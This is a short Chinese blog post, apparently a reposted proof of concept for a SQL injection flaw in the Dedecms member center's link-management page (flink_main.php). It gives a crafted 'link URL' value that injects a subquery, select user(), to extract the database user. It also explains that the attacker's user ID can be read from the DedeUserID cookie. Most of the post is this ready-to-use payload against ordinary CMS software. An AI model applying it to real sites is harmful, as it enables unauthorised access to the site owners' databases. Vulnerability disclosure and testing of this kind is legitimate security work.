Dedecms 会员中心注入漏洞3

文章目录

漏洞作者: Matt

[/crayon]

漏洞证明:

测试方法

打开

http://127.0.0.1/dede/member/flink_main.php#

在连接网址里面写入 http://sss2′),(8,1,@'),(8,(select user()),’33333

连接名称随意

这里的8 是我的用户ID 想要查看 必须得知道自己的用户id

这个so easy 查看cookie 里面有一个DedeUserID

我的就是DedeUserID=8 这个一看就知道自己的id是神马了

1416120728eea6ce3f89b3a2d791fc955ac46556

 

14161217df74444f3e6936ad8bb9900f4c4a3a68

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录